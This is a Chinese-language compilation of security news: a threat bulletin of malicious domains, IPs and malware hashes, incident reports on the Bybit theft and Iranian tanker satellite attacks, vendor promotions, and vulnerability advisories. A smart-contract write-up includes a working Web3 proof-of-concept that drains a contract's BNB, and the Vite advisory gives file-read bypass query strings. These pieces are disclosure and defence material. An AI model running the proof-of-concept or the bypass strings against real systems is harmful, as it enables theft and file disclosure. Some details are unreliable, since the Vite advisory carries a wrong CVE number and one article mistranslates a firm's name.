中国国家网络与信息安全信息通报中心发现一批境外恶意网址和恶意IP,境外黑客组织利用这些网址和IP持续对中国和其他国家发起网络攻击。这些恶意网址和IP都与特定木马程序或木马程序控制端密切关联,网络攻击类型包括建立僵尸网络、挖矿木马、远程控制、后门利用等,对中国国内联网单位和互联网用户构成重大威胁,部分活动已涉嫌刑事犯罪。相关恶意网址和恶意IP归属地主要涉及:美国、法国、荷兰、瑞士等。主要情况如下: 一、恶意地址信息 (一)恶意地址:mo.t1linux.com 关联IP地址:216.152.18.8 归属地:美国/伊利诺伊州/芝加哥 威胁类型:挖矿木马 病毒家族:lucifer 描述:这是一种跨平台、支持多种架构、DDoS与挖矿功能混合的恶意程序,主要借助IoT设备漏洞如Dasan GPON光纤路由器越权和远程命令执行漏洞CVE-2018-10561等进行传播。其包含下载、执行等常见的远程命令和控制功能,能够对指定目标发起DDoS攻击,并借助XMRig开源程序实现门罗币挖取。 (二)恶意地址:pool.dudiito.dev 关联IP地址:5.78.130.39 归属地:美国/俄勒冈州/希尔斯伯勒 威胁类型:挖矿木马 病毒家族:monero 描述:这是一种可在Windows、Linux、MacOS、Android等多个平台运行的开源门罗币挖矿木马,主要通过网络下载方式传播,利用感染主机进行挖矿牟利。 (三)恶意地址:ddos.howardwang2312.com 关联IP地址:91.216.169.28 归属地:美国/加利福尼亚州/东洛杉矶 威胁类型:僵尸网络 病毒家族:moobot 描述:这是一种Mirai僵尸网络的变种,常借助各种IoT设备漏洞例如CVE-2015-2051、CVE-2018-6530、CVE-2022-26258、CVE-2022-28958等进行入侵,攻击者在成功入侵设备后将下载MooBot的二进制文件并执行,进而组建僵尸网络并可能发起DDoS(分布式拒绝服务)攻击。 (四)恶意地址:9cpanel.hackcrack.io 关联IP地址:147.124.205.158 归属地:美国/俄勒冈州/本德 威胁类型:后门 病毒家族:NjRAT 描述:该恶意地址关联到NjRAT病毒家族样本,部分样本程序的MD5值为32b78ad1c0d9d1a0f3761dc7f8bed912。该网络后门是一种由 C#编写的远程访问木马,具备屏幕监控、键盘记录、密码窃取、文件管理(上传、下载、删除、重命名文件)、进程管理(启动或终止进程)、远程激活摄像头、交互式 Shell(远程命令执行)、访问特定 URL 及其它多种恶意控制功能,通常通过移动存储介质感染、网络钓鱼邮件或恶意链接进行传播,用于非法监控、数据窃取和远程控制受害者计算机。 (五)恶意地址:fidapeste2.duckdns.org 关联IP地址:192.169.69.26 归属地:美国/华盛顿州/西雅图 威胁类型:后门 病毒家族:NjRAT 描述:该恶意地址关联到NjRAT病毒家族样本,部分样本程序的MD5值为b5cbf7365e0b43b84497b60f105564f2。该网络后门是一种由 C#编写的远程访问木马,具备屏幕监控、键盘记录、密码窃取、文件管理(上传、下载、删除、重命名文件)、进程管理(启动或终止进程)、远程激活摄像头、交互式 Shell(远程命令执行)、访问特定 URL 及其它多种恶意控制功能,通常通过移动存储介质感染、网络钓鱼邮件或恶意链接进行传播,用于非法监控、数据窃取和远程控制受害者计算机。 (六)恶意地址:banthis.su 关联IP地址:185.142.53.6 归属地:法国/巴黎 威胁类型:僵尸网络 病毒家族:catddos 描述:Catddos病毒家族主要通过IoT设备的N-Day漏洞进行传播,已公开样本包括CVE-2023-46604、CVE-2021-22205等,该恶意地址是相关病毒家族近期有效活跃的回连地址。 (七)恶意地址:62.210.28.199 归属地:法国/巴黎 威胁类型:远程控制 病毒家族:Meterpreter 描述:该恶意地址关联到Meterpreter病毒家族样本,部分样本程序的MD5值为91a77e0d2d4b9bb98b15c78bc4084115。Meterpreter通常被用于在渗透测试和漏洞利用过程中执行攻击操作,常见的攻击传播方式包括漏洞攻击、鱼叉钓鱼等。 (八)恶意地址:seyfhg.work.gd 关联IP地址:146.19.188.249 归属地:荷兰/北荷兰省/阿姆斯特丹 威胁类型:僵尸网络 病毒家族:moobot 描述:这是一种Mirai僵尸网络的变种,常借助各种IoT设备漏洞例如CVE-2015-2051、CVE-2018-6530、CVE-2022-26258、CVE-2022-28958等进行入侵,攻击者在成功入侵设备后将下载MooBot的二进制文件并执行,进而组建僵尸网络并可能发起DDoS(分布式拒绝服务)攻击。 (九)恶意地址:501799.prohoster.biz 关联IP地址:185.212.130.11 归属地:荷兰/北荷兰省/阿姆斯特丹 威胁类型:后门 病毒家族:DCRat 描述:该恶意地址关联到多个DcRat病毒家族样本,部分样本程序MD5值为eba23ee4fa3441dd8972973ac7665007。该网络后门是一种远程访问木马,最早于2018年发布,能够窃取用户隐私信息(系统信息、账号信息等),根据远程指令执行shell命令、截图、记录键盘、窃取cookie、数据上传、操纵剪贴版、删除目录、设置壁纸、发起DDoS攻击等多种功能。 (十)恶意地址:176.96.131.55 归属地:瑞士 威胁类型:后门 病毒家族:Quasar 描述:该恶意地址关联到Quasar病毒家族样本,部分样本程序MD5值为a6de2fc13d573539a75889378af7abc0。这是一种基于.NET Framework的远程管理木马,提供文件管理、进程管理、远程桌面、远程shell、上传下载、获取系统信息、重启关机、键盘记录、窃取密码、注册表编辑等功能,常被攻击者用于信息窃取和远程控制受害者主机。 二、排查方法 (一)详细查看分析浏览器记录以及网络设备中近期流量和DNS请求记录,查看是否有以上恶意地址连接记录,如有条件可提取源IP、设备信息、连接时间等信息进行深入分析。 (二)在本单位应用系统中部署网络流量检测设备进行流量数据分析,追踪与上述网络和IP发起通信的设备网上活动痕迹。 (三)如果能够成功定位到遭受攻击的联网设备,可主动对这些设备进行勘验取证,进而组织技术分析。 三、处置建议 (一)对所有通过社交平台或电子邮件渠道接收的文件和链接保持高度警惕,重点关注其中来源未知或不可信的情况,不要轻易信任或打开相关文件。 (二)及时在威胁情报产品或网络出口防护设备中更新规则,坚决拦截以上恶意网址和恶意IP的访问。 (三)向有关部门及时报告,配合开展现场调查和技术溯源。 文章来源自:国家网络安全通报中心
安全研究人员发现,朝鲜Lazarus黑客在入侵多sig钱包平台Safe{wallet}的开发人员设备后,从Bybit窃取了15亿美元。 Bybit首席执行官分享了Sygnia和Verichains的两项调查的结论,这两项调查都发现攻击源自Safe{Wallet}的基础设施。此次攻击通过向app.safe注入恶意JavaScript专门针对Bybit。 global,由Bybit的签名者访问,有效载荷被设计为只有在满足某些条件时才会激活。这种选择性执行确保了后门不被普通用户发现,同时危及高价值目标。 根据对Bybit签署人机器的调查结果以及在Wayback Archive上发现的缓存恶意JavaScript有效负载,Sygnia认为AWS S3或CloudFront帐户/安全的API密钥。环球公司很可能被泄露或受损。 “在恶意交易执行并发布两分钟后,新版本的JavaScript资源被上传到Safe{Wallet}的AWS S3桶中。这些更新版本已经删除了恶意代码。”Sygnia补充道。 Sygnia还发现,恶意JavaScript代码(针对Bybit的以太坊Multisig冷钱包)来自Safe{Wallet}的AWS S3桶,用于将Bybit的加密资产重定向到攻击者控制的钱包,并在2月21日攻击前两天被修改。事件发生后,叙利亚对Bybit的基础设施进行了调查,没有发现任何被入侵的证据。 安全生态系统基金会在一份声明中证实了他们的结论,该声明透露,攻击是通过首先入侵Safe{wallet}开发人员的机器进行的,该机器为威胁者提供了访问Bybit运营的帐户的权限。 自事件发生以来,Safe{Wallet}团队已经在以太坊主网上恢复了Safe{Wallet},并分阶段推出,暂时删除了本机分类帐集成,即Bybit加密抢劫中使用的签名设备/方法。 恢复Safe{Wallet}服务的分阶段推出还增加了进一步的安全措施,包括增强的监控警报和对交易散列、数据和签名的额外验证。 Safe{Wallet}的团队表示,他们已经完全重建和重新配置了所有基础设施,并旋转了所有凭据,以确保攻击向量已被删除,不能在未来的攻击中使用。 尽管外部安全研究人员进行的取证审查没有发现外管局智能合约或其前端和服务的源代码存在漏洞,但建议用户在签署交易时保持警惕。
3月28日,由小鹏汽车科技有限公司与AUTO TECH China组委会联合主办的“2025汽车创新技术展示交流会”在广州小鹏汽车全球研发总部圆满落幕。本次会议聚焦“智能化、电动化、软件化、AI定义汽车”等相关技术与产品方案,汇聚汽车信息化领域企业代表、行业专家,共同探讨人工智能技术浪潮下智能电动汽车的创新发展路径。 在交流会中,梆梆安全车联网行业专家张廷伦受邀发表《智驭未来·全场景护航:智能网联汽车信息安全解决方案》主题演讲,聚焦智能网联汽车产业高速发展中的安全挑战与机遇,张廷伦指出,在远程攻击频发、数据合规监管趋严、系统架构复杂度提升的背景下,构建覆盖全生命周期的信息安全体系已成为行业关键课题。基于梆梆安全与主流主机厂及零部件厂商的深度合作经验,提出“智能网联汽车全场景信息安全解决方案”,助力车企实现从合规适配到自主防御的能力突破。 智能网联汽车全场景信息安全解决方案 1. 应用安全保障 数字车钥匙:以密钥白盒保护技术为核心,运行环境可信监测为辅,为汽车数字钥匙构筑一个安全可信的终端计算环境,保障汽车数字钥匙关键密钥信息安全; 手机/手表车联APP:从事前检测、事中防护、事后监测三个阶段,全面构建车联APP纵深安全保障体系,帮助OEM提前识别风险、对抗破解逆向攻击、持续感知和阻断安全风险; 车端APP:以安全检测平台为准入抓手,安全加固为防御手段,帮助OEM有效管控车载APP安全风险,提高车载APP的攻击对抗能力,消除车机APP安全隐患; 云端API交互:以自动发现管理API资产为基础,结合前端风险探测能力,协助OEM有效建立API资产清单、实现API的安全治理,解决面向TSP云平台的API攻击、欺诈及数据伪造等安全问题。 2. 整车与零部件安全评估 提供基于国内外汽车信息安全法规要求(如R155/R156/GB 44495)的汽车信息安全认证咨询、TARA分析、合规安全测试、符合性测试、安全渗透测试等服务,支撑车企满足全球市场准入要求。 3. 数据安全合规评估 针对车联数据应用场景,如APP、车载APP、车机IVI等,结合GDPR、GB/T 44464等法规要求,提供的数据安全合规评估服务,确保车联数据合法合规。 4. 支撑能力构建 通过“汽车信息安全测试平台+测试工具箱+知识赋能体系”,协助车企建立自主化信息安全测试能力,实现技术闭环。 梆梆安全作为汽车信息安全领域践行者,深度参与行业技术标准制定,具备多年车联网攻防对抗经验,公司泰防实验室经中国合格评定国家认可委员会(CNAS)评审,具备实施汽车网关和车载信息系统的检测工作能力被授予“实验室认可证书”资质。未来,梆梆安全将持续以技术驱动为核心,助力智能网联汽车产业在安全合规的轨道上行稳致远,为构建可信赖的智慧出行体验贡献力量。
【警钟响起】 2025年3月19日,知名黑客组织Lab Dookhtegan宣称对伊朗两大国有航运公司旗下的116艘油轮发动了“史上最大规模”网络攻击,导致这些船只的卫星通信系统全面瘫痪。此次行动正值美国对也门胡塞武装发动军事打击期间,被外界视为针对伊朗支持地区武装的“精准报复”。 据海事安全公司Cydome分析,此次攻击的核心目标是伊朗国家油轮公司(NITC)和伊斯兰共和国航运公司(IRISL)的卫星通信设备。黑客通过远程入侵船舶VSAT终端,不仅切断了船岸之间的卫星数据传输,还抹除了船舶内部网络的关键配置文件,导致船员无法通过内部通信系统协作。值得注意的是,所有攻击指令均在同一时间发送,展现出高度自动化的攻击链和精准的情报支撑。 现代船舶的通信系统已成为“单点故障”——一旦卫星终端被攻破,黑客可借此渗透至导航、动力等核心系统。而中东局势持续恶化更让问题雪上加霜:胡塞武装对红海商船的袭击已导致中欧航线绕行好望角,运输成本激增40%;如今网络攻击与实体威胁交织,进一步加剧了航运行业风险。 卫星通信系统遭到攻击,已经不是个例。2022年2月24日,在俄乌冲突爆发伊始,“被乌克兰军方密集使用”的卫讯(Viasat)KA-SAT卫星通信网络遭受多路蓄意网络攻击,导致乌克兰与欧洲部分区域KA-SAT卫星宽带用户服务中断。Viasat公司表示,攻击者通过破坏管理网络并发出管理命令,覆盖设备的闪存来关闭客户的家用调制解调器,使它们无法重新连接到网络。随后的调查和取证分析确定了攻击者是从地面网络发起攻击,利用VPN设备中的错误配置来远程访问KA-SAT的受信任管理网络。攻击者通过这个受信任的管理网络横向移动到用于管理和操作网络的特定网段,然后在大量住宅调制解调器上执行了有针对性的管理命令。这次攻击的直接结果是,数以万计的在线调制解调器从KA-SAT网络中掉线,无法重新加入网络。 【深入剖析】 我们发现:面对专业黑客组织攻击,甚至上升至国家级网络空间对抗时,卫星通信系统其实非常脆弱;目前国际上针对卫星互联网的攻击,呈现高频化,扩大化的趋势;卫星互联网国内未爆发大规模安全事件,主要是因为商用民用尚未普及,没有引起黑产关注,但是使用卫星网络的用户都是高价值目标,未来一定会成为网络安全事件的重灾区。 根据研究分析,伊朗油轮涉及的卫星通信设备为iDirect公司的卫星调制解调器产品。该品牌隶属于美国卫星通信行业巨头STE公司(STEngineering iDirect),该公司提供政府及军用卫星通信产品,产品类型包括iDirect调制解调器、集线器和卫星通信解决方案,主要服务于服务商、网络运营商、政府机构、大型企业、军队等客户。其Evolution系列是卫星通信场景中“星状网”的典型代表机型,包括型号:EvolutionX3、EvolutionX5、EvolutionX7系列在海事上有着广泛的应用,可以通过www.daydaymap.com了解全球设备分布情况。 攻击组织通过对iDirect终端进行扫描和测绘,利用弱口令,获取了终端root权限,编写自动攻击脚本,使用终端自带的命令对终端存储器进行擦除,从而破坏了终端系统,造成无法正常工作。iDirect系列调制解调器通常存在默认口令,一般用户不会主动修改该密码导致默认口令的风险存在。另一方面,由于设备厂商较少提供系统更新服务,导致系统版本的陈旧也增加了较大安全风险。 卫星通信系统为何如此脆弱? 卫星通信网络的结构导致了比地面多路由隔离的网络风险更高,由于卫星通信空中通信接口的开放性,使得黑客通过入侵小站即可进入卫星通信网,然后可以通过主站的专线直接入侵用户内网。 供应链不可控且不可靠是非常大的安全隐患。目前在用的卫星通信设备主要供货商都是国外产品,国外供应商在关键设备、枢纽部件上有意无意、或多或少的预制后门,留有漏洞。有些设备厂商通过后门可以直接还原用户传输的密文数据;还有的厂商使用较为脆弱的过时加密算法,使用个人计算机即可达成破译。 通过对设备固件进行提取分析发现,广泛存在厂商预置的账号,用于远程登录和管理控制。这成为了卫星网络常用的入侵手段,伊朗油轮卫星终端以及Viasat卫星网络攻击事件就是采取此类方法,存在重大安全隐患。 卫星终端安全设置薄弱,网络异构,网络设置和通信设置都比较复杂,这也带来了很大的安全风险。 卫星通信系统组网和控制缺乏安全防护措施,控制面、业务面、用户面共用空口信道,但是没有进行安全隔离,不同网络用户缺少安全隔离机制。卫星通信运营商目前只为用户提供基本的通信服务,缺乏完善的通信安全防护措施。 【解决方案】 要彻底解决卫星通信的安全问题,用户需要督促卫星通信设备的供应商,升级卫星终端,尽量排除隐患。有条件的用户可以更换全国产的卫星通信系统,防止留存后门。 针对在用的卫星通信系统,如何提升其安全性?盛邦安全已发布卫星互联网安全解决方案,能从查、测、防等三个方面进行安全加固,主要包含以下内容: 1、卫星网络系统彻查 针对卫星互联网运营单位及用户,提供空口侧、地面侧的安全检查服务,包括通信体制、通信模块、链路层协议、互联网POP节点、地面信关站及终端漏洞的脆弱性分析,并能形成安全分析报告。 2、网络资产排查和分析 通过卫星互联网测绘,排查卫星通信网和地面专网的信息资产暴露面及脆弱面,摸清楚资产底数,建立安全基线。 3、业务网络与办公网络隔离 由于卫星通信相对昂贵,移动载体通常是利用一个卫星通信信道满足多种需求,包括上网,办公,工业控制等多种业务需求,这给安全防护带来了巨大挑战。基于卫星网络特殊性,通过密码定义网络边界技术,实现控制面、业务面、互联网面在波束共用时,终端接入和数据访问权限的安全隔离。 4、卫通通信的安全防护 提供卫星通信加密解决方案,保障卫星终端接入的安全和通信的加密防护,为卫星通信系统提供卫星信道的安全防护措施和终端接入的安全控制。 原文链接
1、背景描述 合约是一个在满足特定条件时在区块链上执行代码的程序,各方以数字签署合同的方式准许并维护它的其运行。这些代码可以是向朋友汇款、买卖 NFT 虚拟商品等一系列复杂的内容。 存在漏洞的目标合约是一个结合Meme文化病毒式传播与去中心化金融(DeFi)的创新项目,旨在通过趣味性和实用性打破传统Meme代币的模式。 该合约的代币目前市值1400K(USDT),日均交易量150K(USDT) 2、问题描述 该合约“withdrawStuckBNB”函数没有添加权限控制,攻击者可以通过调用“withdrawStuckBNB”函数,将合约内所有BNB转至营销地址“marketingAddress”,从而导致合约交易异常。 tips: BNB是BNB链生态系统的原生代币,该系统包含BNB智能链(BSC)和BNB信标链。在BNB智能链上,BNB用于支付交易费用和参与网络的共识机制。BNB还被用作实用代币,使用户在Binance中心化加密货币交易所进行交易时获得交易费用的折扣。 BNB在这个合约中的作用包括:作为交易对的配对货币,用于支付交易手续费,流动性池的组成部分,以及手续费收入的分配媒介 3、问题代码分析 ```solidity function withdrawStuckBNB() external { bool success; (success,) = address(marketingAddress).call{value: address(this).balance}(""); }``` 在合约代码里面可以看到,`withdrawStuckBNB` 没有添加onlyOwner修饰,只有external修饰 tips: Solidity语法中有4中默认函数修饰符 - public:最大访问权限,任何人都可以调用。 - private:只有合约内部可以调用,不可以被继承。 - internal:子合约可以继承和调用。 - external:外部可以调用,子合约可以继承和调用,当前合约不可以调用。 onlyOwner是该合约自定义一个修饰器,用于修饰函数,只有合约的所有者才能调用该函数。 这就意味着任何人都可以调用这个函数,将合约内所有BNB转至营销地址,导致资金被盗。 4、后续利用链分析 从问题代码可知,任何人都可以调用这个函数,将合约内所有BNB转至营销地址marketingAddress 查看marketingAddress的代码,marketingAddress是一个营销地址,更新marketingAddress的代码如下: 可以看到,updateMarketingAddress函数存在onlyOwner修饰,只有owner可以调用这个函数,这就意味着只有owner可以更新marketingAddress的地址。所以利用链到此截止,攻击者只能调用withdrawStuckBNB将合约内的BNB转至marketingAddress,但是marketingAddress本身只能由owner更新,所以攻击者无法更新marketingAddress的地址,从而无法将BNB转至攻击者的地址,但是漏洞也能造成合约内BNB的清空,影响合约运行。 5、构造POC ```javascriptconst Web3 = require('web3');// // 初始化 Web3 实例,这里使用测试网的地址,你可以根据实际情况修改const web3 = new Web3('https://data-seed-prebsc-1-s1.binance.org:8545');// const web3 = new Web3('https://bsc-dataseed4.binance.org/'); const contractABI = ["""换成完整ABI"""];const contractAddress = "0xaaaaa"; // 替换为目标合约地址const contract = new web3.eth.Contract(contractABI, contractAddress);console.log("connect success"); // 如果使用 Node.js,需要添加私钥const privateKey = '0xbbbbbbbbbbbbbb'; // 替换为你的私钥const account = web3.eth.accounts.privateKeyToAccount(privateKey);web3.eth.accounts.wallet.add(account); async function withdrawBNB() { try{ console.log(account.address); const tx = { from: account.address, // 必须使用真实地址 to: contractAddress, gas: 300000, data: contract.methods.withdrawStuckBNB().encodeABI() }; // 估算 gas const gas = await web3.eth.estimateGas(tx); tx.gas = gas; // 获取当前 gasPrice const gasPrice = await web3.eth.getGasPrice(); tx.gasPrice = gasPrice; // 签名并发送交易(Node.js 方式) const signedTx = await web3.eth.accounts.signTransaction(tx, privateKey); const receipt = await web3.eth.sendSignedTransaction(signedTx.rawTransaction); console.log('Transaction Hash:', receipt.transactionHash); console.log('Receipt:', receipt); } catch (error) { console.error("Error:", error); } console.log("2");} withdrawBNB();console.log("3");``` 6、修复方案 在withdrawStuckBNB函数中添加onlyOwner修饰,只允许owner可以调用这个函数 ```solidity function withdrawStuckBNB() external onlyOwner { (bool success,) = marketingAddress.call{value: address(this).balance}(""); require(success, "Transfer failed"); }``` 该漏洞目前已向相关单位和厂商报送并已推出补丁,使用此漏洞造成的任何攻击影响均与本文作者无关。 原文链接
1、漏洞概述 近日,微软发布windows操作系统更新修复漏洞,其中Windows 文件资源管理器欺骗漏洞(CVE-2025-24071、CVE-2025-24054)正被广泛利用,建议您及时开展安全风险自查。 据描述,由于windows的资源管理器默认信任libray-ms文件,支持读取此类文件进行渲染图标、缩略图和详细信息。当压缩包内存在此类文件时,用户解压包含smb(文件共享服务)路径配置的libray-ms文件,会自动被windows资源管理器内置文件解析机制解析,将受害者的NTLM身份信息发送到攻击者smb服务器。攻击者利用这种隐式信任和自动文件处理行为来泄露凭据,然后可以利用这些凭据进行哈希传递攻击或脱机 NTLM 哈希破解。攻击者可以利用该漏洞以管理员权限执行操作,包括但不限于创建新用户、修改现有用户的权限、安装恶意软件等。 漏洞影响的产品和版本: Windows Server 2022 Windows Server 2019 (Server Core installation) Windows Server 2019 Windows 10 Version 1809 for x64-based Systems Windows 10 Version 1809 for 32-bit Systems Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Server 2016 (Server Core installation) Windows Server 2016 Windows 10 Version 1607 for x64-based Systems Windows 10 Version 1607 for 32-bit Systems Windows 10 for x64-based Systems Windows 10 for 32-bit Systems Windows Server 2025 Windows 11 Version 24H2 for x64-based Systems Windows 11 Version 24H2 for ARM64-based Systems Windows Server 2022, 23H2 Edition (Server Core installation) Windows 11 Version 23H2 for x64-based Systems Windows 11 Version 23H2 for ARM64-based Systems Windows Server 2025 (Server Core installation) Windows 10 Version 22H2 for 32-bit Systems Windows 10 Version 22H2 for ARM64-based Systems Windows 10 Version 22H2 for x64-based Systems Windows 11 Version 22H2 for x64-based Systems Windows 11 Version 22H2 for ARM64-based Systems Windows 10 Version 21H2 for x64-based Systems Windows 10 Version 21H2 for ARM64-based Systems Windows 10 Version 21H2 for 32-bit Systems Windows Server 2022 (Server Core installation) 2、漏洞复现 3、资产测绘 4、解决方案 升级修复 目前windows已发布修复安全补丁: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24071 5、参考链接 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24054 https://www.ddpoc.com/DVB-2023-8999.html 原文链接
2025年3月31日,Coremail邮件安全人工智能实验室、CACTER邮件安全研究团队和奇安信行业安全研究中心联合发布了《2024中国企业邮箱安全性研究报告》。 本报告聚焦于中国企业邮箱安全性,以电子邮箱的使用、垃圾邮件、钓鱼邮件、带毒邮件为核心研究对象,从其规模、发送源、受害者分布以及典型案例等多维度展开深入分析。 一、2024年国内企业邮件活跃用户规模约2亿 根据Coremail邮件安全人工智能实验室与奇安信行业安全研究中心的联合监测,同时综合网易、腾讯、阿里巴巴等主流企业邮箱服务提供商的公开数据进行分析评估,2024年活跃的国内企业邮箱用户规模约为2亿,与2023年用户规模相比增长约5.3%。 二、2024年正常邮件收发占比46.8% 据报告显示,2024 年,全国企业级邮箱用户共收发各类电子邮件约8188.4 亿封,同比增长了 4.8%,日均收发电子邮件约 22.4 亿封。其中,正常邮件占比约为46.8%、普通垃圾邮件占比为38.3%、钓鱼邮件9.2%、带毒邮件 5.4%。 三、2024年钓鱼邮件同比增加30.8% 2024年全国企业邮箱用户共收到各类钓鱼邮件约755.0亿封,相比2023年收到各类钓鱼邮件的577.1亿封,增加了30.8%。钓鱼邮件数量在2021年短暂抑制后,持续迅猛增长。 四、香港成为发送钓鱼邮件最多的地区 从国内钓鱼邮件发送源的服务器所在地来看,香港特别行政区超越了江苏省成为国内发送钓鱼邮件最多的省级行政区,有17.8%的钓鱼邮件来自香港的邮箱;江苏的钓鱼邮件活动依旧活跃,有约14.9%的钓鱼邮件来自江苏;另有约9.6%的钓鱼邮件来自广东。 五、2024年国内电子邮箱账号被盗规模达1074万 从过去几年的总体情况来看,邮箱盗号问题仍在持续加剧:2024年国内企业邮箱账号被盗总量是2020年的近2.3倍;被盗账号数量在当年活跃邮箱账号中的占比也从2.97%猛增到5.37%。邮箱账号安全管理问题亟待加强。 六、生成式AI加剧钓鱼邮件威胁 据调查显示,越来越多的攻击者正在使用生成式AI,更加快速地制作更有针对性的恶意邮件文案内容。邮件攻击者,开始采用AI技术进行自动化的邮件攻击,主要体现在目标人群选择、投放策略制定和口令爆破攻击等方面。这种动态演进的威胁模式对传统防御策略提出了更高的挑战,推动企业与安全厂商加速研发AI驱动的防御工具以应对持续升级的威胁。 七、应对措施 为应对这一威胁,CACTER结合大模型能力,全新推出大模型邮件安全网关,以“AI之盾”防御“AI之矛”,为企业提供全方位的邮件安全防护: ·语义深度理解能力:基于Transformer架构的上下文建模,能够精准识别恶意邮件中的复杂语义和隐晦意图,有效拦截伪装成正常邮件的钓鱼邮件。 ·多模态联合分析能力:实现跨文本、图像、附件的统一表征学习,不仅能检测文本内容,还能识别邮件中的恶意图片、附件等,全方位拦截各类恶意邮件。 ·零样本威胁检测能力:借助大模型的泛化推理能力,即使面对从未见过的新型恶意邮件,也能快速识别并拦截,无需依赖已知样本。 ·攻击者画像构建能力:通过社交网络辅助的关联分析,构建攻击者画像,精准识别攻击者的特征和行为模式,提前预警并防范潜在威胁
1、漏洞概述 近日,Vite 官方披露了一个中高风险安全漏洞(CVE-2025-29927),攻击者可以利用该漏洞读取服务器敏感文件,建议您及时开展安全风险自查。 Vite 是一个现代的前端构建工具,旨在提高开发效率。它由 Vue.js 的作者尤雨溪及其团队开发,并于2021年发布。Vite 的核心设计理念是利用现代浏览器对 ES 模块(ESM)的支持,提供了一个更快、更轻量级的开发服务器以及高效的构建流程。 据描述,Vite 在版本 6.2.3、6.1.2、6.0.12、5.4.15 和 4.5.10 之前的版本中存在一个安全漏洞。该漏洞与 @fs 模块有关,它原本用于限制对 Vite 服务允许列表之外文件的访问。然而,通过在 URL 后添加 “?raw??” 或 “?import&raw??”,可以绕过这一限制并返回文件内容(如果文件存在的话)。这是因为尾部的分隔符如 “?” 在多个地方被移除,但没有在查询字符串的正则表达式中考虑到这种情况。这导致任意文件的内容可能会被返回到浏览器中。 需要注意的是,只有那些明确将 Vite 开发服务器暴露在网络中的应用(即使用了 --host 参数或 server.host 配置选项的应用)才会受到影响。此问题已在版本 6.2.3、6.1.2、6.0.12、5.4.15 和 4.5.10 中得到修复。 漏洞影响的产品和版本: Vite >=6.2.0, =6.1.0, =6.0.0, =5.0.0, <=5.4.14 <=4.5.9 2、漏洞复现 3、资产测绘 据daydaymap数据显示互联网存在33,652个资产,国内风险资产分布情况如下: 4、解决方案 临时缓解方案: 部署针对项目的监控系统:阻止包含“@fs” 或 “?import&raw??” 的外部用户请求到达您的应用程序。 升级修复: 目前官方已发布修复安全补丁 https://github.com/vitejs/vite/releases 5、参考链接 https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w https://www.ddpoc.com/DVB-2023-9014.html 原文链接
1、漏洞概述 近日,SAML-Toolkits 发布ruby-saml修复了严重身份认证绕过漏洞(CVE-2025-25291、CVE-2025-25292)。已知受影响的产品有GitLab,其社区版 (CE) 和企业版 (EE) 推出了新的 17.9.2、17.8.5 和 17.7.7 版本,以修补一系列安全漏洞。为避免您的业务受影响,建议您及时开展安全风险自查。 ruby-saml 是一个 Ruby 语言开发的库,用于支持 SAML(安全断言标记语言) 身份验证,使应用程序能够与身份提供者(Identity Provider)进行安全通信。该库广泛应用于 Web 应用程序中,以实现单点登录(SSO)功能。其核心功能包括解析 SAML 断言(SAML assertions)和验证数字签名,以确保身份验证流程的安全性。 GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的Web服务。Gitlab是被广泛使用的基于git的开源代码管理平台, 基于Ruby on Rails构建, 主要针对软件开发过程中产生的代码和文档进行管理。 然而,ruby-saml库和使用该库的GitLab产品存在可导致身份验证绕过(Authentication Bypass)的漏洞(CVE-2025-25291、CVE-2025-25292),可能严重威胁依赖该库的应用程序的安全。 据描述,这些漏洞的根本原因在于 ReXML 和 Nokogiri 解析 XML 的方式,这可能导致同一 XML 输入的文档结构不同。这种差异使签名包装攻击成为可能,从而可能导致身份验证绕过。 漏洞影响的产品和版本: Ruby-saml= 1.13.0, < 1.18.0 GitLab 17.9.2 之前的 17.9 版本、17.8.5 之前的 17.8 版本,以及 17.7.7 之前的 17.7 版本。 2、资产测绘 据daydaymap数据显示互联网存在2,583,285个资产,国内风险资产分布情况如下: 3、解决方案 1、临时缓解措施 ①在 SAML SSO 身份验证的基础上,增加额外的身份验证步骤,如二次验证、短信验证码等,提高账户安全性; ②禁用 SAML 双重认证绕过:在 GitLab 设置中禁用 SAML 双重认证绕过选项。 2、升级修复 ①Gitlab立即升级:所有受影响的 GitLab 实例应尽快升级到最新的安全版本(17.9.2、17.8.5 或 17.7.7); ②ruby-saml库升级到安全版本:1.12.4或1.18.0。 4、参考链接 https://github.com/advisories/GHSA-4vc4-m8qh-g8jm https://securityonline.info/gitlab-urgently-patches-critical-authentication-bypass-flaws-cve-2025-25291-cve-2025-25292/ 原文链接
随着全球AI技术的迅猛发展,大模型技术逐渐渗透到各行各业。从ChatGPT引领的AI革命,到Sora重塑内容生产方式,再到DeepSeek开年之际的技术突破,各大厂商纷纷加入大模型的快速迭代进程,推动着这一领域的持续创新。 然而,随着大模型技术的应用普及,数据隐私问题也愈加突出:用户对话被恶意爬取、企业核心数据泄露、跨国数据传输遭遇黑产攻击……在享受技术创新带来便利的同时,如何保障数据安全已经成为无法回避的重要议题。 大模型面临的隐私、安全与信任挑战 在大模型训练过程中,海量数据被广泛应用,其中可能涵盖个人健康信息、财务数据、地理位置及企业敏感信息等。一旦发生泄露,不仅会引发严重的隐私风险和财产损失,还可能损害品牌声誉。尤其是在医疗、金融等行业,数据泄露的影响不止经济损失,还可能引发信任危机。 (图片来源于光明网) 数据泄露风险在数据传输环节尤为明显 在大模型的使用过程中,用户通过网络将数据传输到云端服务器进行处理,由于数据传输依赖公有网络,信息在传输过程中可能遭到黑客攻击和窃取。尽管开源模型可实现本地部署,但由于本地设备的性能限制,实际应用中仍需依赖第三方平台。数据上传过程中,如何保障数据的安全成为关键问题。 数据链路层加密解决方案,守护大模型应用中的数据传输安全 与传统的IPSec VPN、SSL VPN等加密方式不同,盛邦安全数据链路层加密解决方案通过硬件嵌入式系统实现超低延迟的信息加密传输,保障各系统节点、异地机构之间的数据传输安全;采用国家商用密码算法,在链路层对数据包进行加密和认证保护,避免增加网络节点或配置IP,可实现即插即用。 硬件平台采用CPU+MCU+FPGA架构,MCU负责密钥管理和非对称密码算法服务,FPGA实现数据加解密,CPU负责控制平面,处理平面和控制管理平面的分离设计,可靠性更强、性能更高;链路加密产品加密传输性能已经达到100Gbps,延迟在20us以内。并支持点到点、点到多点的多链路复杂网络环境部署,同时具备密钥和策略的集中管理功能,可实现密钥的自动生成、分发、更换和应急销毁等操作,有效防范伪冒身份非法接入网络信道,以及通过流量劫持、重放攻击等手段导致的数据泄露风险。 